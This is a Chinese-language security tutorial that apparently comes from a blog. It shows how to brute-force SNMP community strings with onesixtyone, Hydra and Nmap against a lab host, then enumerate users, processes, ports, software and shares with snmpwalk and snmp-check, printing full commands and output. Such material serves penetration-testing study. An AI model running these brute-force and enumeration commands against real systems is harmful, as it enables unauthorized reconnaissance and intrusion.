网络扫描:利用SNMP服务

Ann2021-08-05 10:08:55

SNMP(Simple Network Management Protocol,简单网络管理协议)是由一组网络管理的标准组成,包含一个应用层协议和一组资源对象。该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况。本文介绍利用SNMP服务获取主机信息的方法。


1. SNMP服务概述


SNMP是一种简单的网络管理协议,它使用UDP协议通过以太网来执行网络管理。下面介绍SNMP服务的一些基础知识。


(1)SNMP服务的构成


SNMP协议主要由两大部分构成,分别是SNMP管理站和SNMP代理。其中,SNMP管理站是一个中心节点,负责收集维护各个SNMP元素的信息,并对这些信息进行处理,最后反馈给网络管理员;而SNMP代理是运行在各个被管理的网络节点之上,负责统计该节点的各项信息,并且负责与SNMP管理站交互,接收并执行管理站的命令,上传各种本地的网络信息。


SNMP管理站和SNMP代理之间是松散耦合的关系。它们之间的通信是通过UDP协议完成的。一般情况下,SNMP管理站通过UDP协议向SNMP代理发送各种命令。当SNMP代理收到命令后,返回SNMP管理站需要的参数。当SNMP代理检测到网络元素异常的时候,也可以主动向SNMP管理站发送消息,通知当前异常状况。


(2)SNMP工作方式


SNMP服务采用UDP协议在管理端和代理端之间传输信息。SNMP采用UDP端口161接收和发送请求,162端口接收Trap信息,执行SNMP的设备默认都必须使用这些端口。


(3)SNMP版本


SNMP目前共有v1、v2和v3 3个版本,这3个版本的区别如下。


SNMP v1:是SNMP协议的最初版本,不过依然是众多厂家实现SNMP的基本方式。


SNMP v2:通常指基于Community的SNMP V2,Community实质上就是密码。


SNMP v3:是最新版本的SNMP。其最大改进在于安全性,增加了对认证和密文传输的支持。


2. 暴力破解SNMP服务


如果要访问SNMP服务,则需要知道其密码。所以,如果要利用SNMP服务来获取主机信息的话,则需要先知道其加密的密码串。下面介绍暴力破解SNMP服务的方法。


(1)使用Onesixtyoue工具


Onesixtyoue是一个专门针对于SNMP协议的扫描器。如果指定其密码,即可获取到目标主机的相关信息;如果不知道密码,也可以用来实施密码破解。使用Onesixtyoue工具破解SNMP服务密码的语法格式如下:


onesixtyoue [host] -c [communityfile]


其中,-c[communityfile]选项用于指定尝试的密码文件。


使用Onesixtyoue工具破解SNMP服务密码。执行命令如下:


root@daxueba:~# onesixtyone 192.168.1.5 -c /root/password.lst

Scanning 1 hosts, 15 communities

192.168.1.5 [public] Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT

COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)


从输出的信息可以看到,使用Onesixtyoue工具成功破解出了SNMP服务的密码,并且获取到了目标主机信息。其中,破解出的密码为public;目标主机的硬件为Intel64、操作系统为Windows Version 6.1。


(2)使用Hydra工具


Hydra是著名的黑客组织THC的一款开源暴力破解工具。目前,该工具支持破解的服务有FTP、MySQL、SNMP、SSH等。用于暴力破解SNMP服务的语法格式如下:


hydra -P [passwordfile] [host] snmp


其中,-P选项指定用于破解的密码文件。


使用Hydra工具实施SNMP服务暴力破解。执行命令如下:


root@daxueba:~# hydra -P /root/password.lst 192.168.1.5 snmp

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2021-08-04 14:33:50

[DATA] max 15 tasks per 1 server, overall 15 tasks, 15 login tries (l:1/p:15),~1 try per task

[DATA] attacking snmp://192.168.1.5:161/

[161][snmp] host: 192.168.1.5  password: public

1 of 1 target successfully completed, 1 valid password found

Hydra (http://www.thc.org/thc-hydra) finished at 2021-08-04 14:33:58


从以上输出的信息可以看到,使用Hydra工具成功破解出了目标主机上SNMP服务的密码,该密码为public。


(3)使用Nmap工具


在Nmap工具中提供了一个脚本snmp-brute,可以用来实施SNMP服务暴力破解。其中,使用该脚本实施暴力破解的语法格式如下:


nmap -sU -p [port] --script=snmp-brute [host] --script-args=snmp-brute.

communitiesdb=[password]


以上语法中的选项及含义如下:


-sU:实施UDP扫描。

-p[port]:指定目标服务的端口。

--script:实施SNMP服务暴力破解脚本。

--script-args:指定实施暴力破解的参数。


对目标SNMP服务实施暴力破解。执行命令如下:


root@daxueba:~# nmap -sU -p 161 --script=snmp-brute 192.168.1.5 --script-

args=snmp-brute.communitiesdb=/root/password.lst

Starting Nmap 7.70 ( https://nmap.org ) at 2021-08-04 14:35 CST

Nmap scan report for test-pc (192.168.1.5)

Host is up (0.00025s latency).

PORT  STATE     SERVICE

161/udp  open|filtered   snmp

| snmp-brute:

|_ public - Valid credentials #有效认证

MAC Address: 00:0C:29:21:8C:96 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.11 seconds


从输出的信息可以看到,使用Nmap工具成功破解出了目标服务的密码,该密码为public。

undefined

3. 获取主机信息


当确定目标主机上开启了SNMP服务时,可以利用SNMP服务来获取主机信息。下面介绍获取主机信息的方法。


(1)使用Onesixtyoue工具


Onesixtyoue是一个简单的SNMP分析工具,使用该工具,仅请求指定地址的系统描述值。在使用Onesixtyoue工具分析SNMP时,需要指定目标IP地址和社区字符串。该工具默认的社区字符串是public。使用Onesixtyoue工具获取主机信息的语法格式如下:


onesixtyone [host] [community]


例如,使用Onesixtyoue工具,获取主机信息。执行命令如下:


root@daxueba:~# onesixtyone 192.168.6.109 public

Scanning 1 hosts, 1 communities

192.168.6.109 [public] Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT

COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)


从以上输出信息中,可以看到显示出了主机192.168.6.109的操作系统类型、版本和系统硬件等信息。


(2)使用SNMPwalk工具


SNMPwalk是一个比较复杂的SNMP扫描工具,它可以收集使用SNMP社区字符串设备的大量信息。使用SNMPwalk工具获取主机信息的语法格式如下:


snmpwalk [host] -c [community] -v [version]


以上语法中的选项及含义如下。


-c:指定SNMP服务的密码串。

-v:指定使用的SNMPwalk版本。目前有1c、2c和3c这3个版本。


使用SNMPwalk工具利用主机192.168.1.5上的SNMP服务来获取主机信息。在该主机中SNMP服务默认的社区字符串为public,版本为2c。执行命令如下:


root@daxueba:~# snmpwalk 192.168.1.5 -c public -v 2c

iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)"

iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1

iso.3.6.1.2.1.1.3.0 = Timeticks: (649146) 1:48:11.46

iso.3.6.1.2.1.1.4.0 = ""

iso.3.6.1.2.1.1.5.0 = STRING: "Test-PC"

iso.3.6.1.2.1.1.6.0 = ""

iso.3.6.1.2.1.1.7.0 = INTEGER: 76

iso.3.6.1.2.1.2.1.0 = INTEGER: 24

iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1

iso.3.6.1.2.1.2.2.1.1.2 = INTEGER: 2

iso.3.6.1.2.1.2.2.1.1.3 = INTEGER: 3

iso.3.6.1.2.1.2.2.1.1.4 = INTEGER: 4

iso.3.6.1.2.1.2.2.1.1.5 = INTEGER: 5

iso.3.6.1.2.1.2.2.1.1.6 = INTEGER: 6

iso.3.6.1.2.1.2.2.1.1.7 = INTEGER: 7

iso.3.6.1.2.1.2.2.1.1.8 = INTEGER: 8

iso.3.6.1.2.1.2.2.1.1.9 = INTEGER: 9

iso.3.6.1.2.1.2.2.1.1.10 = INTEGER: 10

iso.3.6.1.2.1.2.2.1.1.11 = INTEGER: 11

iso.3.6.1.2.1.2.2.1.1.12 = INTEGER: 12

iso.3.6.1.2.1.2.2.1.1.13 = INTEGER: 13

iso.3.6.1.2.1.2.2.1.1.14 = INTEGER: 14

iso.3.6.1.2.1.2.2.1.1.15 = INTEGER: 15

iso.3.6.1.2.1.2.2.1.1.16 = INTEGER: 16

iso.3.6.1.2.1.2.2.1.1.17 = INTEGER: 17

iso.3.6.1.2.1.2.2.1.1.18 = INTEGER: 18

iso.3.6.1.2.1.2.2.1.1.19 = INTEGER: 19

iso.3.6.1.2.1.2.2.1.1.20 = INTEGER: 20

iso.3.6.1.2.1.2.2.1.1.21 = INTEGER: 21

iso.3.6.1.2.1.2.2.1.1.22 = INTEGER: 22

iso.3.6.1.2.1.2.2.1.1.23 = INTEGER: 23

iso.3.6.1.2.1.2.2.1.1.24 = INTEGER: 24

iso.3.6.1.2.1.2.2.1.2.1 = Hex-STRING: 53 6F 66 74 77 61 72 65 20 4C 6F 6F 70 62 61 63 6B 20 49 6E 74 65 72 66 61 63 65 20 31 00

iso.3.6.1.2.1.2.2.1.2.2 = Hex-STRING: 57 41 4E 20 4D 69 6E 69 70 6F 72 74 20 28 53 53 54 50 29 00

iso.3.6.1.2.1.2.2.1.2.3 = Hex-STRING: 57 41 4E 20 4D 69 6E 69 70 6F 72 74 20 28 4C 32 54 50 29 00


从以上输出信息中可以看到显示出了主机192.168.1.5上大量设备的唯一标识符(OID)信息。


(3)使用snmp-check工具


snmp-check是一款枚举SNMP信息工具,该工具会显示具体信息名称,而不像SNMPwalk工具一样只显示iso序列号。snmp-check工具支持的枚举包括设备、域、硬件,以及存储信息、主机名和监听端口等。使用snmp-check工具枚举SNMP信息的语法格式如下:


snmp-check [option] [target IP address]


这里常用的选项option及含义如下。


-p:指定SNMP服务的端口,默认是161。

-c:指定SNMP服务的密码串,默认是public。

-v:指定SNMP版本,可指定的版本有1和2c,其中,默认版本是1。

-t:指定超时值,默认是5秒。


使用snmp-check工具获取目标主机信息,执行命令如下:


root@daxueba:~# snmp-check 192.168.1.5


执行以上命令后,将会输出大量与主机相关的信息。下面依次介绍每个部分,并对其输出结果进行描述。


1)获取到的系统信息,如主机名、IP地址、操作系统类型及架构等。具体如下:


snmp-check v1.9 - SNMP enumerator

Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.1.5:161 using SNMPv1 and community 'public'

[*] System information:

Host IP address  : 192.168.1.5  #目标主机IP地址

Hostname  : Test-PC   #主机名

Description  : Hardware: Intel64 Family 6 Model 42 Stepping 7 AT/AT COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)  #描述信息

Contact  #联系人

Location  #描述

Uptime snmp  : 04:59:17.32  #SNMP服务运行的时间

Uptime system : 02:03:16.26  #目标系统运行的时间

System date : 2021-08-04 16:15:50.0  #当前目标系统的时间

Domain  : WORKGROUP


输出的信息显示了该系统中的所有用户。其中,目标主机中的用户有bob、ftp、Test等。


2)获取用户账号信息:


[*] User accounts:

bob

ftp

Test

Guest

Administrator

HomeGroupUser$


输出的信息显示了该系统中的所有用户。其中,目标主机中的用户有bob、ftp、Test等。


3)获取网络信息:


[*] Network information:

IP forwarding enabled  : no  #是否启用IP转发

Default TTL   : 128   #默认TTL值

TCP segments received  : 19004  #收到TCP段

TCP segments sent  : 16820  #发送TCP段

TCP segments retrans  : 179   #重发TCP端

Input datagrams  : 28944  #输入数据报

Delivered datagrams  : 35035  #传输的数据报

Output datagrams  : 43038  #输出数据报


以上信息显示了该目标系统中网络的相关信息,如默认TTL值、收到TCP段、发送TCP段、重发TCP段等。


4)获取网络接口信息:


[*] Network interfaces:

Interface  : [ up ] Software Loopback Interface 1 #接口描述信息

Id    : 1   #接口ID

Mac Address   : :::::   #MAC地址

Type  : softwareLoopback  #接口类型

Speed   : 1073 Mbps   #接口速度

MTU  : 1500  #最大传输单元

In octets   : 0   #八位字节输入

Out octets   : 0   #八位字节输出

Interface  : [ up ] WAN Miniport (SSTP)

Id   : 2

Mac Address   : :::::

Type    : unknown

Speed  : 1073 Mbps

MTU   : 4091

In octets    : 0

Out octets  : 0

……省略部分内容

Interface : [ up ] WAN Miniport (Network Monitor)-QoS Packet Scheduler-0000

Id   : 24

Mac Address   : a8:ac:20:52:41:53

Type    : ethernet-csmacd

Speed    : 1073 Mbps

MTU    : 1500

In octets    : 0

Out octets   : 0


以上输出信息显示了当前系统中的所有接口信息。其中,分别显示了每个接口的ID、MAC地址、类型、速度和最大传输单元等。


5)获取网络IP信息:


[*] Network IP:

Id   IP Address  Netmask Broadcast

1   127.0.0.1  255.0.0.0  1

11  192.168.1.5  255.255.255.0 1

18  192.168.67.1 255.255.255.0  1

17  192.168.254.1 255.255.255.0  1


以上显示的信息,表示当前目标主机中所有的网络接口地址信息。从以上输出信息中可以看到共有4个接口。其中,IP地址分别是127.0.0.1、192.168.1.5、192.168.67.1和192.168.254.1。


6)获取路由信息:


[*] Routing information:

Destination  Next hop  Mask   Metric

0.0.0.0  192.168.1.1  0.0.0.0   10

127.0.0.0  127.0.0.1   255.0.0.0  306

127.0.0.1  127.0.0.1  255.255.255.255   306

127.255.255.255  127.0.0.1  255.255.255.255  306

192.168.1.0  192.168.1.5   255.255.255.0  266

192.168.1.5  192.168.1.5  255.255.255.255  266

192.168.1.255  192.168.1.5  255.255.255.255  266

192.168.67.0  192.168.67.1  255.255.255.0  276

192.168.67.1  192.168.67.1  255.255.255.255  276

192.168.67.255  192.168.67.1  255.255.255.255  276

192.168.254.0  192.168.254.1  255.255.255.0  276

192.168.254.1  192.168.254.1  255.255.255.255 276

192.168.254.255  192.168.254.1  255.255.255.255  276

224.0.0.0   127.0.0.1  240.0.0.0  306

255.255.255.255  127.0.0.1  255.255.255.255  306


以上信息表示目标系统的一个路由表信息,该路由表包括目的地址、下一跳地址、子网掩码及距离。


7)获取监听的TCP端口:


[*] TCP connections and listening ports:

Local address  Local port  Remote address  Remote port  State

0.0.0.0  21  0.0.0.0   0  listen

0.0.0.0  22  0.0.0.0   0  listen

0.0.0.0  135   0.0.0.0  0 listen

0.0.0.0  443  0.0.0.0  0  listen

0.0.0.0   902  0.0.0.0   0  listen

0.0.0.0  912  0.0.0.0  0  listen

127.0.0.1 1434  0.0.0.0  0   listen

127.0.0.1  5357  127.0.0.1  49733  timeWait

127.0.0.1  8307  0.0.0.0   0  listen

127.0.0.1  14147  0.0.0.0  0  listen

192.168.1.5  139  0.0.0.0  0  listen

192.168.1.5   49161  42.236.37.114  80  established

192.168.1.5  49730  223.167.166.52  80  established

192.168.67.1  139   0.0.0.0   0  listen

192.168.254.1  139  0.0.0.0   0  listen


以上信息表示两台主机建立TCP连接后的信息,包括本地地址(Local address)、本地端口(Local port)、远端主机地址(Remote address)、远端主机端口(Remote port)和状态(State)。

undefined

8)获取监听的UDP端口信息:


[*] Listening UDP ports:

Local address     Local port

0.0.0.0        161

0.0.0.0        500

0.0.0.0        3544

0.0.0.0        3600

0.0.0.0        3702

0.0.0.0        4500

0.0.0.0        5355

0.0.0.0        45769

0.0.0.0        50529

0.0.0.0        60289

0.0.0.0        60399

0.0.0.0        62219

127.0.0.1       1900

127.0.0.1       56372

192.168.1.5      137

192.168.1.5      138

192.168.1.5      1900

192.168.1.5      56371

192.168.1.5      65005

192.168.67.1     137

192.168.67.1     138

192.168.67.1     1900

192.168.254.1     137

192.168.254.1     138

192.168.254.1     1900


以上信息表示目标主机中已开启的UDP端口号。其中,开放的端口有137、138和1900等。


9)获取网络服务信息:


[*] Network services:

Index     Name

0     Power

1     Server

2     Themes

3      IP Helper

4      DNS Client

5      Superfetch

6     DHCP Client

7     Workstation

8      SNMP Service

9     VMware Tools

10    主动防御

11     Offline Files

…省略部分内容

61     SQL Server Integration Services

62     VMware 物理磁盘助手服务

63     Function Discovery Provider Host

64     Peer Networking Identity Manager

65      System Event Notification Service

66     World Wide Web Publishing Service

67     Extensible Authentication Protocol

68      Windows Management Instrumentation

69     Windows Process Activation Service

70     Distributed Transaction Coordinator

71     IKE and AuthIP IPsec Keying Modules

72     Desktop Window Manager Session Manager

73      Background Intelligent Transfer Service

74      Function Discovery Resource Publication

75      VMware Alias Manager and Ticket Service

76      WinHTTP Web Proxy Auto-Discovery Service

77     SQL Server Analysis Services (MSSQLSERVER)


以上信息显示了目标主机中安装的所有服务。在以上信息中,第1列表示服务索引,第2列表示服务名称。由于篇幅所限,这里只列出了一少部分服务。


10)获取进程信息:


[*] Processes:

Id  Status   Name  Path  Parameters

1   running  System Idle Process

4   running  System

300  running  smss.exe  \SystemRoot\System32\

396  running  csrss.exe  %SystemRoot%\system32\ Object

Directory=\Windows SharedSection=1024,20480,768 Windows=On SubSystem Type=Windows ServerDll=basesrv,1 ServerDll=winsrv:User

436  running  wininit.exe

448  running csrss.exe  %SystemRoot%\system32\ Object

Directory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:User

484  running  winlogon.exe

540  running  services.exe  C:\Windows\system32\

556 running  lsass.exe  C:\Windows\system32\

564  running lsm.exe  C:\Windows\system32\

652  running  svchost.exe

696 running vmtoolsd.exe C:\Program Files\VMware\VMware Tools\ -n vmusr


从以上显示的信息中可以看到共有5列,分别是ID号(Id)、状态(Status)、进程名(Name)、路径(Path)和参数(Parameters)。限于篇幅,这里仅简单列举了几个进程的相关信息。


11)获取存储信息:


[*] Storage information:

Description  : ["C:\\ Label: Serial Number d0ce180b"] #描述信息

Device id : [#] #设备ID

Filesystem type  : ["unknown"] #文件系统类型

Device unit : [#] #设备单元

Memory size  : 299.90 GB  #内存总大小

Memory used  : 49.66 GB  #已用内存大小

Description       : ["D:\\"]

Device id  : [#]

Filesystem type : ["unknown"]

Device unit  : [#]

Memory size  : 0 bytes

Memory used : 0 bytes

Description  : ["E:\\ Label:\xD0\xC2\xBC\xD3\xBE\xED

Serial Number c6d01134"]

Device id  : [#]

Filesystem type : ["unknown"]

Device unit : [#]

Memory size   : 300.00 GB

Memory used  : 24.54 GB

Description  : ["Virtual Memory"]

Device id  : [#]

Filesystem type : ["unknown"]

Device unit : [#]

Memory size   : 4.00 GB

Memory used  : 1.66 GB

Description : ["Physical Memory"]

Device id  : [#]

Filesystem type  : ["unknown"]

Device unit : [#]

Memory size  : 2.00 GB

Memory used : 1.05 GB


该部分显示了系统中的所有磁盘信息,包括盘符名、设备ID、文件系统类型、总空间大小及已用空间大小。


12)获取文件系统信息:


[*] File system information:

Index   : 1   #索引

Mount point   :   #挂载点

Remote mount point  : -  #远程挂载点

Access  : 1  #是否允许访问

Bootable  : 0  #是否可以引导


以上显示了当前目标主机的文件系统信息。从以上信息中可以看到文件系统的索引、挂载点及访问权限等信息。


13)获取设备信息:


[*] Device information:

Id   Type   Status   Descr

1  unknown   running  Snagit 11 Printer

2   unknown  running  Microsoft XPS Document Writer

3   unknown  running  Microsoft Shared Fax Driver

4  unknown  running  Unknown Processor Type

5  unknown  unknown  Software Loopback Interface 1

6  unknown   unknown  WAN Miniport (SSTP)

7  unknown  unknown  WAN Miniport (L2TP)

8   unknown   unknown   WAN Miniport (PPTP)

9   unknown   unknown  WAN Miniport (PPPOE)

……省略部分内容

29  unknown  unknown  D:\

30  unknown  running  Fixed Disk

31  unknown  running  Fixed Disk

32 unknown  running  IBM enhanced (101- or 102-key) keyboard,

Subtype=(0)

33  unknown    unknown     COM1:


以上信息显示了该系统中所有设备的相关信息,如打印设备、网络设备和处理器等。


14)获取软件组件信息:


[*] Software components:

Index    Name

1   DAEMON Tools Lite

2   Microsoft SQL Server 2005 (64 λ)

3    USBPcap 1.2.0.4

4   WinRAR 5.50 (64-λ)

5   Microsoft .NET Framework 4.7.2

6   Microsoft SQL Server ?????????????(???)

7   Microsoft Visual C++ 2017 x64 Additional Runtime –14.12.25810

8   Microsoft .NET Framework 4.7.2 (CHS)

9   VMware Tools

10  Microsoft SQL Server 2005 ??????

11  Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161

12  Microsoft SQL Server 2005 Analysis Services (64 λ)

13  Microsoft Visual C++ 2013 x64 Additional Runtime –12.0.21005

14  Microsoft .NET Framework 4.7.2

15  Microsoft .NET Framework 4.7.2 (????????)

16  Microsoft SQL Server 2005 Integration Services (64 λ)

17  SQLXML4

18  VMware Workstation

19   Microsoft Visual C++ 2013 x64 Minimum Runtime –12.0.21005

20  Microsoft SQL Server VSS ??д??

21  Microsoft Visual C++ 2017 x64 Minimum Runtime –14.12.25810

22  Microsoft SQL Server Native Client

23  Microsoft SQL Server 2005 Notification Services (64 λ)

24  Microsoft SQL Server 2005 Tools (64 λ)

25  Microsoft SQL Server 2005 (64 λ)


以上信息显示了目标主机中安装的所有软件组件。例如,安装的软件组件有DAEMON Tools Lite、Microsoft SQL Server 2005(64λ)、USBPcap 1.2.0.4和WinRAR 5.50(64-λ)等。


15)IIS服务信息:


[*] IIS server information:

TotalBytesSentLowWord  : 0  #发送的最低总字节数

TotalBytesReceivedLowWord : 0 #接收的最低总字节数

TotalFilesSent  : 0  #总共发送的文件

CurrentAnonymousUsers  : 0 #当前匿名用户

CurrentNonAnonymousUsers  : 0  #当前非匿名用户

TotalAnonymousUsers  : 0  #匿名用户总数

TotalNonAnonymousUsers   : 0 #非匿名用户总数

MaxAnonymousUsers  : 0 #最大匿名用户总数

MaxNonAnonymousUsers  : 0  #最大非匿名用户总数

CurrentConnections  : 0 #当前连接数

MaxConnections : 0  #最大连接数

ConnectionAttempts  : 0  #尝试连接数

LogonAttempts  : 0  #尝试登录数

Gets  : 0  #Get请求数

Posts  : 0  #Post请求数

Heads  : 0  #Head请求数

Others  : 0  #其他请求数

CGIRequests   : 0  #CGI请求数

BGIRequests  : 0  #BGI请求数

NotFoundErrors  : 0 #没有找到的错误数


以上输出信息显示了目标主机中IIS服务的相关信息,包括服务器允许发送/接收的字节数、匿名用户和最大连接数等信息。


16)共享信息:


[*] Share:

Name : Users

Path   : C:\Users

Comment  :

Name  : share

Path  : E:\share

Comment  :


在以上信息中显示了目标主机中的共享用户和文件名。从显示的结果可以看到,共享的用户为Users、共享的文件夹为E:\share。

网络命令snmp
本作品采用《CC 协议》,转载必须注明作者和本文链接
SNMP(Simple Network Management Protocol,简单网络管理协议)是由一组网络管理的标准组成,包含一个应用层协议和一组资源对象。该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况。本文介绍利用SNMP服务获取主机信息的方法
网络设备越来越大,就需要实时去管理如此诸多的设备,SNMP应运而生。
1.命令简介 tcpdump 是一款类 Unix/Linux 环境下的抓包工具,允许用户截获和显示发送或收到的网络数据包。tcpdump 是一个在 BSD 许可证下发布的自由软件。 2.命令格式
1.命令简介 tcpdump 是一款类 Unix/Linux 环境下的抓包工具,允许用户截获和显示发送或收到的网络数据包。tcpdump 是一个在 BSD 许可证下发布的自由软件。 2.命令格式 tcpdump [ -AbdDefhlLnNOpqRStuUvxX ] [ -B buffer_size ] [ -c count ]
管理员角色对于保护网络免受攻击至关重要,需要配备专门人员来保护网络上的设备、应用程序和信息。应在网络边界实施多层防御,以抵御外部威胁,监控和限制出入流量。在整个网络中部署多层下一代防火墙,限制出入流量,检查网络区域之间的所有内部活动。NAC方案可防止未授权物理连接,监控网络上已授权的物理连接。为防护这些漏洞,管理员应禁用所有不必要的功能,并对流向VPN网关的流量采用严格的流量过滤规则。
它支持针对网络层、协议、主机、网络或端口的过滤,并提供 and、or、not 等逻辑语句来帮助你摘取有用信息。辅助功能型:gateway、less、broadcast、greater4、tcpdump 捕获方式tcpdump [协议类型] [源或目标] [主机名称或 IP] [or/and/not/!条件组合] [端口] [端口号] ……
僵尸网络于2020年11月出现在威胁领域,在某些情况下,攻击利用了最近披露的漏洞来注入OS命令。攻击旨在破坏受感染的系统以创建IRC僵尸网络,该僵尸网络以后可用于进行多种恶意活动,包括DDoS攻击和加密采矿活动。一旦感染了设备,它将稍后用作攻击平台。它们在代码的不同功能中用于不同的检查系统的TerraMaster TOS版本创建和发送数据包中间人攻击的ARP中毒。该僵尸网络尚处于早期阶段,在分析时,IRC面板显示它仅控制188个僵尸网络
Ann
暂无描述